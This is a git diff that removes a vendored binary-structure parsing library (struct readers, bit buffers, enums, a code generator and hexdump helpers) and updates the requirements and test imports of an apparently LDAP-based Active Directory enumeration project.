- return size - - def _read(self, stream, *args, **kwargs): - log("[Structure::read] {} {}", self.name, self.size) - bitbuffer = BitBuffer(stream, self.cstruct.endian) - - struct_start = stream.tell() - - r = OrderedDict() - sizes = {} - for field in self.fields: - start = stream.tell() - ft = self.cstruct.resolve(field.type) - - if field.offset: - if start != struct_start + field.offset: - log( - "+ seeking to 0x{:x}+0x{:x} for {}".format( - struct_start, field.offset, field.name - ) - ) - stream.seek(struct_start + field.offset) - start = struct_start + field.offset - - if field.bits: - r[field.name] = bitbuffer.read(ft, field.bits) - continue - else: - bitbuffer.reset() - - if isinstance(ft, (Array, Pointer)): - v = ft._read(stream, r) - else: - v = ft._read(stream) - - sizes[field.name] = stream.tell() - start - r[field.name] = v - - return Instance(self, r, sizes) - - def _write(self, stream, data): - bitbuffer = BitBuffer(stream, self.cstruct.endian) - num = 0 - - for field in self.fields: - if field.bits: - bitbuffer.write(field.type, getattr(data, field.name), field.bits) - continue - - if bitbuffer._type: - bitbuffer.flush() - - num += field.type._write(stream, getattr(data, field.name)) - - # Flush bitbuffer - if bitbuffer._type: - bitbuffer.flush() - - return num - - def add_field(self, name, type_, offset=None): - """Add a field to this structure. - - Args: - name: The field name. - type_: The field type. - offset: The field offset. - """ - field = Field(name, type_, offset=offset) - self.fields.append(field) - self.lookup[name] = field - self.size = None - setattr(self, name, field) - - def default(self): - """Create and return an empty Instance from this structure. - - Returns: - An empty Instance from this structure. - """ - r = OrderedDict() - for field in self.fields: - r[field.name] = field.type.default() - - return Instance(self, r) - - def __len__(self): - if self.size is None: - self.size = self._calc_size() - - return self.size - - def __repr__(self): - return ''.format(self.name) - - def show(self, indent=0): - """Pretty print this structure.""" - if indent == 0: - print("struct {}".format(self.name)) - - for field in self.fields: - if field.offset is None: - offset = '0x??' - else: - offset = '0x{:02x}'.format(field.offset) - - print("{}+{} {} {}".format(' ' * indent, offset, field.name, field.type)) - - if isinstance(field.type, Structure): - field.type.show(indent + 1) - - -class BitBuffer(object): - """Implements a bit buffer that can read and write bit fields.""" - - def __init__(self, stream, endian): - self.stream = stream - self.endian = endian - - self._type = None - self._buffer = 0 - self._remaining = 0 - - def read(self, field_type, bits): - if self._remaining < 1 or self._type != field_type: - self._type = field_type - self._remaining = field_type.size * 8 - self._buffer = field_type._read(self.stream) - - if self.endian != '>': - v = self._buffer & ((1 << bits) - 1) - self._buffer >>= bits - self._remaining -= bits - else: - v = self._buffer & ( - ((1 << (self._remaining - bits)) - 1) ^ ((1 << self._remaining) - 1) - ) - v >>= self._remaining - bits - self._remaining -= bits - - return v - - def write(self, field_type, data, bits): - if self._remaining == 0: - self._remaining = field_type.size * 8 - self._type = field_type - - if self.endian != '>': - self._buffer |= data << (self._type.size * 8 - self._remaining) - else: - self._buffer |= data << (self._remaining - bits) - - self._remaining -= bits - - def flush(self): - self._type._write(self.stream, self._buffer) - self._type = None - self._remaining = 0 - self._buffer = 0 - - def reset(self): - self._type = None - self._buffer = 0 - self._remaining = 0 - - -class Field(object): - """Holds a structure field.""" - - def __init__(self, name, type_, bits=None, offset=None): - self.name = name - self.type = type_ - self.bits = bits - self.offset = offset - - def __repr__(self): - return ''.format(self.name, self.type) - - -class Array(BaseType): - """Implements a fixed or dynamically sized array type. - - Example: - When using the default C-style parser, the following syntax is supported: - - x[3] -> 3 -> static length. - x[] -> None -> null-terminated. - x[expr] -> expr -> dynamic length. - """ - - def __init__(self, cstruct, type_, count): - self.type = type_ - self.count = count - self.dynamic = isinstance(self.count, Expression) or self.count is None - - super(Array, self).__init__(cstruct) - - def _read(self, stream, context=None): - if self.count is None: - return self.type._read_0(stream) - - if self.dynamic: - count = self.count.evaluate(context) - else: - count = self.count - - return self.type._read_array(stream, max(0, count)) - - def _write(self, f, data): - if self.count is None: - return self.type._write_0(f, data) - - return self.type._write_array(f, data) - - def default(self): - if self.dynamic or self.count is None: - return [] - - return [self.type.default() for i in xrange(self.count)] - - def __repr__(self): - if self.count is None: - return '{0!r}[]'.format(self.type) - - return '{0!r}[{1}]'.format(self.type, self.count) - - def __len__(self): - if self.dynamic: - raise TypeError("Dynamic size") - - return len(self.type) * self.count - - -class PackedType(RawType): - """Implements a packed type that uses Python struct packing characters.""" - - def __init__(self, cstruct, name, size, packchar): - self.packchar = packchar - super(PackedType, self).__init__(cstruct, name, size) - - def _read(self, stream): - return self._read_array(stream, 1)[0] - - def _read_array(self, stream, count): - length = self.size * count - data = stream.read(length) - fmt = self.cstruct.endian + str(count) + self.packchar - if len(data) != length: - raise EOFError("Read %d bytes, but expected %d" % (len(data), length)) - - return list(struct.unpack(fmt, data)) - - def _read_0(self, stream): - r = [] - while True: - d = stream.read(self.size) - v = struct.unpack(self.cstruct.endian + self.packchar, d)[0] - - if v == 0: - break - - r.append(v) - - return r - - def _write(self, stream, data): - return self._write_array(stream, [data]) - - def _write_array(self, stream, data): - fmt = self.cstruct.endian + str(len(data)) + self.packchar - return stream.write(struct.pack(fmt, *data)) - - def _write_0(self, stream, data): - return self._write_array(stream, data + [0]) - - def default(self): - return 0 - - def default_array(self, count): - return [0] * count - - -class CharType(RawType): - """Implements a character type that can properly handle strings.""" - - def __init__(self, cstruct): - super(CharType, self).__init__(cstruct, 'char', 1) - - def _read(self, stream): - return stream.read(1) - - def _read_array(self, stream, count): - if count == 0: - return b'' - - return stream.read(count) - - def _read_0(self, stream): - r = [] - while True: - c = stream.read(1) - if c == b'': - raise EOFError() - - if c == b'\x00': - break - - r.append(c) - - return b''.join(r) - - def _write(self, stream, data): - if isinstance(data, int): - data = chr(data) - - if PY3 and isinstance(data, str): - data = data.encode('latin-1') - - return stream.write(data) - - def _write_array(self, stream, data): - return self._write(stream, data) - - def _write_0(self, stream, data): - return self._write(stream, data + b'\x00') - - def default(self): - return b'\x00' - - def default_array(self, count): - return b'\x00' * count - - -class WcharType(RawType): - """Implements a wide-character type.""" - - def __init__(self, cstruct): - super(WcharType, self).__init__(cstruct, 'wchar', 2) - - @property - def encoding(self): - if self.cstruct.endian == '<': - return 'utf-16-le' - elif self.cstruct.endian == '>': - return 'utf-16-be' - - def _read(self, stream): - return stream.read(2).decode(self.encoding) - - def _read_array(self, stream, count): - if count == 0: - return u'' - - data = stream.read(2 * count) - return data.decode(self.encoding) - - def _read_0(self, stream): - r = b'' - while True: - c = stream.read(2) - - if len(c) != 2: - raise EOFError() - - if c == b'\x00\x00': - break - - r += c - - return r.decode(self.encoding) - - def _write(self, stream, data): - return stream.write(data.encode(self.encoding)) - - def _write_array(self, stream, data): - return self._write(stream, data) - - def _write_0(self, stream, data): - return self._write(stream, data + u'\x00') - - def default(self): - return u'\x00' - - def default_array(self, count): - return u'\x00' * count - - -class BytesInteger(RawType): - """Implements an integer type that can span an arbitrary amount of bytes.""" - - def __init__(self, cstruct, name, size, signed): - self.signed = signed - super(BytesInteger, self).__init__(cstruct, name, size) - - @staticmethod - def parse(buf, size, count, signed, endian): - nums = [] - - for c in xrange(count): - num = 0 - data = buf[c * size:(c + 1) * size] - if endian == '<': - data = b''.join(data[i:i + 1] for i in reversed(xrange(len(data)))) - - ints = list(data) if PY3 else map(ord, data) - for i in ints: - num = (num << 8) | i - - if signed and num & 1 << (size * 8 - 1): - bias = 1 << (size * 8 - 1) - num -= bias * 2 - - nums.append(num) - - return nums - - @staticmethod - def pack(data, size, endian): - buf = [] - for i in data: - num = int(i) - if num < 0: - num += 1 << (size * 8) - - d = [b'\x00'] * size - i = size - 1 - - while i >= 0: - b = num & 255 - d[i] = bytes((b,)) if PY3 else chr(b) - num >>= 8 - i -= 1 - - if endian == '<': - d = b''.join(d[i:i + 1][0] for i in reversed(xrange(len(d)))) - else: - d = b''.join(d) - - buf.append(d) - - return b''.join(buf) - - def _read(self, stream): - return self.parse(stream.read(self.size * 1), self.size, 1, self.signed, self.cstruct.endian)[0] - - def _read_array(self, stream, count): - return self.parse(stream.read(self.size * count), self.size, count, self.signed, self.cstruct.endian) - - def _read_0(self, stream): - r = [] - while True: - v = self._read(stream) - if v == 0: - break - r.append(v) - - return r - - def _write(self, stream, data): - return stream.write(self.pack([data], self.size, self.cstruct.endian)) - - def _write_array(self, stream, data): - return stream.write(self.pack(data, self.size, self.cstruct.endian)) - - def _write_0(self, stream, data): - return self._write_array(stream, data + [0]) - - def default(self): - return 0 - - def default_array(self, count): - return [0] * count - - -class Enum(RawType): - """Implements an Enum type. - - Enums can be made using any type. The API for accessing enums and their - values is very similar to Python 3 native enums. - - Example: - When using the default C-style parser, the following syntax is supported: - - enum [: ] { - - }; - - For example, an enum that has A=1, B=5 and C=6 could be written like so: - - enum Test : uint16 { - A, B=5, C - }; - """ - - def __init__(self, cstruct, name, type_, values): - self.type = type_ - self.values = values - self.reverse = {} - - for k, v in values.items(): - self.reverse[v] = k - - super(Enum, self).__init__(cstruct, name, len(self.type)) - - def __call__(self, value): - return EnumInstance(self, value) - - def _read(self, stream): - v = self.type._read(stream) - return self(v) - - def _read_array(self, stream, count): - return list(map(self, self.type._read_array(stream, count))) - - def _read_0(self, stream): - return list(map(self, self.type._read_0(stream))) - - def _write(self, stream, data): - data = data.value if isinstance(data, EnumInstance) else data - return self.type._write(stream, data) - - def _write_array(self, stream, data): - data = [d.value if isinstance(d, EnumInstance) else d for d in data] - return self.type._write_array(stream, data) - - def _write_0(self, stream, data): - data = [d.value if isinstance(d, EnumInstance) else d for d in data] - return self.type._write_0(stream, data) - - def default(self): - return self(0) - - def __getitem__(self, attr): - if attr in self.values: - return self(self.values[attr]) - - raise KeyError(attr) - - def __getattr__(self, attr): - if attr in self.values: - return self(self.values[attr]) - - raise AttributeError(attr) - - def __contains__(self, attr): - return attr in self.values - - -class EnumInstance(object): - """Implements a value instance of an Enum""" - - def __init__(self, enum, value): - self.enum = enum - self.value = value - - @property - def name(self): - if self.value not in self.enum.reverse: - return '{}_{}'.format(self.enum.name, self.value) - return self.enum.reverse[self.value] - - def __eq__(self, value): - if isinstance(value, EnumInstance) and value.enum is not self.enum: - return False - - if hasattr(value, 'value'): - value = value.value - - return self.value == value - - def __ne__(self, value): - return self.__eq__(value) is False - - def __hash__(self): - return hash((self.enum, self.value)) - - def __str__(self): - return '{}.{}'.format(self.enum.name, self.name) - - def __repr__(self): - return '<{}.{}: {}>'.format(self.enum.name, self.name, self.value) - - -class Union(RawType): - def __init__(self, cstruct): - self.cstruct = cstruct - super(Union, self).__init__(cstruct) - - def _read(self, stream): - raise NotImplementedError() - - -class Pointer(RawType): - """Implements a pointer to some other type.""" - - def __init__(self, cstruct, target): - self.cstruct = cstruct - self.type = target - super(Pointer, self).__init__(cstruct) - - def _read(self, stream, ctx): - addr = self.cstruct.pointer(stream) - return PointerInstance(self.type, stream, addr, ctx) - - def __len__(self): - return len(self.cstruct.pointer) - - def __repr__(self): - return ''.format(self.type) - - -class VoidType(RawType): - """Implements a void type.""" - - def __init__(self): - super(VoidType, self).__init__(None, 'void', 0) - - def _read(self, stream): - return None - - -def ctypes(structure): - """Create ctypes structures from cstruct structures.""" - fields = [] - for field in structure.fields: - t = ctypes_type(field.type) - fields.append((field.name, t)) - - tt = type(structure.name, (_ctypes.Structure, ), {"_fields_": fields}) - return tt - - -def ctypes_type(t): - mapping = { - "I": _ctypes.c_ulong, - "i": _ctypes.c_long, - "b": _ctypes.c_int8, - } - - if isinstance(t, PackedType): - return mapping[t.packchar] - - if isinstance(t, CharType): - return _ctypes.c_char - - if isinstance(t, Array): - subtype = ctypes_type(t._type) - return subtype * t.count - - if isinstance(t, Pointer): - subtype = ctypes_type(t._target) - return ctypes.POINTER(subtype) - - raise NotImplementedError("Type not implemented: %s" % t.__class__.__name__) - - -class Compiler(object): - """Compiler for cstruct structures. Creates somewhat optimized parsing code.""" - - def __init__(self, cstruct): - self.cstruct = cstruct - - def compile(self, structure): - source = self.gen_struct_class(structure) - c = compile(source, '', 'exec') - - env = { - 'OrderedDict': OrderedDict, - 'Structure': Structure, - 'Instance': Instance, - 'Expression': Expression, - 'EnumInstance': EnumInstance, - 'PointerInstance': PointerInstance, - 'BytesInteger': BytesInteger, - 'BitBuffer': BitBuffer, - 'struct': struct, - 'xrange': xrange, - } - - exec(c, env) - sc = env[structure.name](self.cstruct, structure, source) - - return sc - - def gen_struct_class(self, structure): - blocks = [] - classes = [] - cur_block = [] - read_size = 0 - prev_was_bits = False - - for field in structure.fields: - ft = self.cstruct.resolve(field.type) - - if not isinstance( - ft, - ( - Structure, - Pointer, - Enum, - Array, - PackedType, - CharType, - WcharType, - BytesInteger, - ), - ): - raise CompilerError("Unsupported type for compiler: {}".format(ft)) - - if isinstance(ft, Structure) or ( - isinstance(ft, Array) and isinstance(ft.type, Structure) - ): - if cur_block: - blocks.append(self.gen_read_block(read_size, cur_block)) - - struct_read = 's = stream.tell()\n' - if isinstance(ft, Array): - num = ft.count - - if isinstance(num, Expression): - num = 'max(0, Expression(self.cstruct, "{expr}").evaluate(r))'.format( - expr=num.expr - ) - - struct_read += ( - 'r["{name}"] = []\n' - 'for _ in xrange({num}):\n' - ' r["{name}"].append(self.cstruct.{struct_name}._read(stream))\n'.format( - name=field.name, num=num, struct_name=ft.type.name - ) - ) - else: - struct_read += 'r["{name}"] = self.cstruct.{struct_name}._read(stream)\n'.format( - name=field.name, struct_name=ft.name - ) - - struct_read += 'sizes["{name}"] = stream.tell() - s'.format( - name=field.name - ) - blocks.append(struct_read) - read_size = 0 - cur_block = [] - continue - - if field.bits: - if cur_block: - blocks.append(self.gen_read_block(read_size, cur_block)) - - blocks.append( - 'r["{name}"] = bitreader.read(self.cstruct.{type_name}, {bits})'.format( - name=field.name, type_name=field.type.name, bits=field.bits - ) - ) - read_size = 0 - cur_block = [] - prev_was_bits = True - continue - elif prev_was_bits: - blocks.append('bitreader.reset()') - prev_was_bits = False - - try: - count = len(ft) - read_size += count - cur_block.append(field) - except Exception: - if cur_block: - blocks.append(self.gen_read_block(read_size, cur_block)) - blocks.append(self.gen_dynamic_block(field)) - read_size = 0 - cur_block = [] - - if len(cur_block): - blocks.append(self.gen_read_block(read_size, cur_block)) - - read_code = '\n\n'.join(blocks) - read_code = '\n'.join([' ' * 2 + line for line in read_code.split('\n')]) - - classes.append(COMPILE_TEMPL.format(name=structure.name, read_code=read_code)) - return '\n\n'.join(classes) - - def gen_read_block(self, size, block): - templ = ( - 'buf = stream.read({size})\n' - 'if len(buf) != {size}: raise EOFError()\n' - 'data = struct.unpack(self.cstruct.endian + "{{}}", buf)\n' - '{{}}'.format(size=size) - ) - readcode = [] - fmt = [] - - curtype = None - curcount = 0 - - buf_offset = 0 - data_offset = 0 - - for field in block: - ft = self.cstruct.resolve(field.type) - t = ft - count = 1 - data_count = 1 - read_slice = '' - - if isinstance(t, Enum): - t = t.type - elif isinstance(t, Pointer): - t = self.cstruct.pointer - - if isinstance(ft, Array): - count = t.count - data_count = count - t = t.type - - if isinstance(t, Enum): - t = t.type - elif isinstance(t, Pointer): - t = self.cstruct.pointer - - if isinstance(t, (CharType, WcharType, BytesInteger)): - read_slice = '{}:{}'.format( - buf_offset, buf_offset + (count * t.size) - ) - else: - read_slice = '{}:{}'.format(data_offset, data_offset + count) - elif isinstance(t, CharType): - read_slice = str(buf_offset) - elif isinstance(t, (WcharType, BytesInteger)): - read_slice = '{}:{}'.format(buf_offset, buf_offset + t.size) - else: - read_slice = str(data_offset) - - if not curtype: - if isinstance(t, PackedType): - curtype = t.packchar - else: - curtype = 'x' - - if isinstance(t, (PackedType, CharType, WcharType, BytesInteger, Enum)): - charcount = count - - if isinstance(t, (CharType, WcharType, BytesInteger)): - data_count = 0 - packchar = 'x' - charcount *= t.size - else: - packchar = t.packchar - - if curtype != packchar: - fmt.append('{}{}'.format(curcount, curtype)) - curcount = 0 - - curcount += charcount - curtype = packchar - - getter = '' - if isinstance(t, BytesInteger): - getter = 'BytesInteger.parse(buf[{slice}], {size}, {count}, {signed}, self.cstruct.endian){data_slice}'.format( - slice=read_slice, - size=t.size, - count=count, - signed=t.signed, - data_slice='[0]' if count == 1 else '', - ) - elif isinstance(t, (CharType, WcharType)): - getter = 'buf[{}]'.format(read_slice) - if isinstance(t, WcharType): - getter += ".decode('utf-16-le' if self.cstruct.endian == '<' else 'utf-16-be')" - else: - getter = 'data[{}]'.format(read_slice) - - if isinstance(ft, Enum): - getter = 'EnumInstance(self.cstruct.{type_name}, {getter})'.format( - type_name=ft.name, getter=getter - ) - elif isinstance(ft, Array) and isinstance(ft.type, Enum): - getter = '[EnumInstance(self.cstruct.{type_name}, d) for d in {getter}]'.format( - type_name=ft.type.name, getter=getter - ) - elif isinstance(ft, Pointer): - getter = 'PointerInstance(self.cstruct.{type_name}, stream, {getter}, r)'.format( - type_name=ft.type.name, getter=getter - ) - elif isinstance(ft, Array) and isinstance(ft.type, Pointer): - getter = '[PointerInstance(self.cstruct.{type_name}, stream, d, r) for d in {getter}]'.format( - type_name=ft.type.name, getter=getter - ) - elif isinstance(ft, Array) and isinstance(t, PackedType): - getter = 'list({})'.format(getter) - - readcode.append( - 'r["{name}"] = {getter}'.format(name=field.name, getter=getter) - ) - readcode.append( - 'sizes["{name}"] = {size}'.format(name=field.name, size=count * t.size) - ) - - data_offset += data_count - buf_offset += count * t.size - - if curcount: - fmt.append('{}{}'.format(curcount, curtype)) - - return templ.format(''.join(fmt), '\n'.join(readcode)) - - def gen_dynamic_block(self, field): - if not isinstance(field.type, Array): - raise CompilerError( - "Only Array can be dynamic, got {!r}".format(field.type) - ) - - t = field.type.type - reader = None - - if not field.type.count: # Null terminated - if isinstance(t, PackedType): - reader = ( - 't = []\nwhile True:\n' - ' d = stream.read({size})\n' - ' if len(d) != {size}: raise EOFError()\n' - ' v = struct.unpack(self.cstruct.endian + "{packchar}", d)[0]\n' - ' if v == 0: break\n' - ' t.append(v)'.format(size=t.size, packchar=t.packchar) - ) - - elif isinstance(t, (CharType, WcharType)): - reader = ( - 't = []\n' - 'while True:\n' - ' c = stream.read({size})\n' - ' if len(c) != {size}: raise EOFError()\n' - ' if c == b"{null}": break\n' - ' t.append(c)\nt = b"".join(t)'.format( - size=t.size, null='\\x00' * t.size - ) - ) - - if isinstance(t, WcharType): - reader += ".decode('utf-16-le' if self.cstruct.endian == '<' else 'utf-16-be')" - elif isinstance(t, BytesInteger): - reader = ( - 't = []\n' - 'while True:\n' - ' d = stream.read({size})\n' - ' if len(d) != {size}: raise EOFError()\n' - ' v = BytesInteger.parse(d, {size}, 1, {signed}, self.cstruct.endian)\n' - ' if v == 0: break\n' - ' t.append(v)'.format(size=t.size, signed=t.signed) - ) - - return '{reader}\nr["{name}"] = t\nsizes["{name}"] = len(t)'.format( - reader=reader, name=field.name - ) - else: - expr = field.type.count.expr - expr_read = ( - 'dynsize = max(0, Expression(self.cstruct, "{expr}").evaluate(r))\n' - 'buf = stream.read(dynsize * {type_size})\n' - 'if len(buf) != dynsize * {type_size}: raise EOFError()\n' - 'r["{name}"] = {{reader}}\n' - 'sizes["{name}"] = dynsize * {type_size}'.format( - expr=expr, name=field.name, type_size=t.size - ) - ) - - if isinstance(t, PackedType): - reader = 'list(struct.unpack(self.cstruct.endian + "{{:d}}{packchar}".format(dynsize), buf))'.format( - packchar=t.packchar, type_size=t.size - ) - elif isinstance(t, (CharType, WcharType)): - reader = 'buf' - if isinstance(t, WcharType): - reader += ".decode('utf-16-le' if self.cstruct.endian == '<' else 'utf-16-be')" - elif isinstance(t, BytesInteger): - reader = 'BytesInteger.parse(buf, {size}, dynsize, {signed}, self.cstruct.endian)'.format( - size=t.size, signed=t.signed - ) - - return expr_read.format(reader=reader, size=None) - - -def hexdump(s, palette=None, offset=0, prefix=""): - """Hexdump some data. - - Args: - s: Bytes to hexdump. - palette: Colorize the hexdump using this color pattern. - offset: Byte offset of the hexdump. - prefix: Optional prefix. - """ - if palette: - palette = palette[::-1] - - remaining = 0 - active = None - - for i in xrange(0, len(s), 16): - vals = "" - chars = [] - for j in xrange(16): - if not active and palette: - remaining, active = palette.pop() - vals += active - elif active and j == 0: - vals += active - - if i + j >= len(s): - vals += " " - else: - c = s[i + j] - c = chr(c) if PY3 else c - p = c if c in PRINTABLE else "." - - if active: - vals += "{:02x}".format(ord(c)) - chars.append(active + p + COLOR_NORMAL) - else: - vals += "{:02x}".format(ord(c)) - chars.append(p) - - remaining -= 1 - if remaining == 0: - active = None - - if palette is not None: - vals += COLOR_NORMAL - - if j == 15: - if palette is not None: - vals += COLOR_NORMAL - - vals += " " - - if j == 7: - vals += " " - - chars = "".join(chars) - print("{}{:08x} {:48s} {}".format(prefix, offset + i, vals, chars)) - - -def dumpstruct(t, data=None, offset=0): - """Dump a structure or parsed structure instance. - - Prints a colorized hexdump and parsed structure output. - - Args: - t: Structure or Instance to dump. - data: Bytes to parse the Structure on, if t is not a parsed Instance. - offset: Byte offset of the hexdump. - """ - colors = [ - (COLOR_RED, COLOR_BG_RED), - (COLOR_GREEN, COLOR_BG_GREEN), - (COLOR_YELLOW, COLOR_BG_YELLOW), - (COLOR_BLUE, COLOR_BG_BLUE), - (COLOR_PURPLE, COLOR_BG_PURPLE), - (COLOR_CYAN, COLOR_BG_CYAN), - (COLOR_WHITE, COLOR_BG_WHITE), - ] - - if isinstance(t, Instance): - g = t - t = t._type - data = g.dumps() - elif isinstance(t, Structure) and data: - g = t(data) - else: - raise ValueError("Invalid arguments") - - palette = [] - ci = 0 - out = "struct {}".format(t.name) + ":\n" - for field in g._type.fields: - fg, bg = colors[ci % len(colors)] - palette.append((g._size(field.name), bg)) - ci += 1 - - v = getattr(g, field.name) - if isinstance(v, str): - v = repr(v) - elif isinstance(v, int): - v = hex(v) - elif isinstance(v, list): - v = pprint.pformat(v) - if '\n' in v: - v = v.replace('\n', '\n{}'.format(' ' * (len(field.name) + 4))) - - out += "- {}{}{}: {}\n".format(fg, field.name, COLOR_NORMAL, v) - - print() - hexdump(data, palette, offset=offset) - print() - print(out) diff --git a/requirements.txt b/requirements.txt index 508978d..541f735 100644 --- a/requirements.txt +++ b/requirements.txt @@ -10,7 +10,6 @@ Jinja2==2.11.2 ldap3==2.8.1 ldapdomaindump==0.9.3 MarkupSafe==1.1.1 -progressbar==2.5 pyasn1==0.4.8 pycparser==2.20 pycryptodomex==3.9.8 diff --git a/test/test_ade.py b/test/test_ade.py index b20394f..6b31a38 100644 --- a/test/test_ade.py +++ b/test/test_ade.py @@ -1,4 +1,4 @@ -import ade +from ade import ade import pytest import ldap3 import contextlib @@ -11,7 +11,7 @@ def test_enumAD_runWithoutCreds(): out = io.StringIO() with contextlib.redirect_stdout(out): with pytest.raises(SystemExit) as ldaperr: - adeEnum = ade.EnumAD('domain.local', True, False, False, False, False, False, False, True) + adeEnum = ade.EnumAD('domain.local', True, False, False, False, False, False, False, True, False, False) adeEnum.runWithoutCreds() assert "ERROR" in out.getvalue() assert "Failed to bind to LDAPS server: " in out.getvalue() \ No newline at end of file diff --git a/test/test_imports.py b/test/test_imports.py index 56e66af..3651c05 100644 --- a/test/test_imports.py +++ b/test/test_imports.py @@ -1,13 +1,12 @@ def test_ade_imports(): - import ade + from ade import ade import termcolor import argparse import textwrap import sys import re import ldap3 - import progressbar import ldap3 import impacket import getpass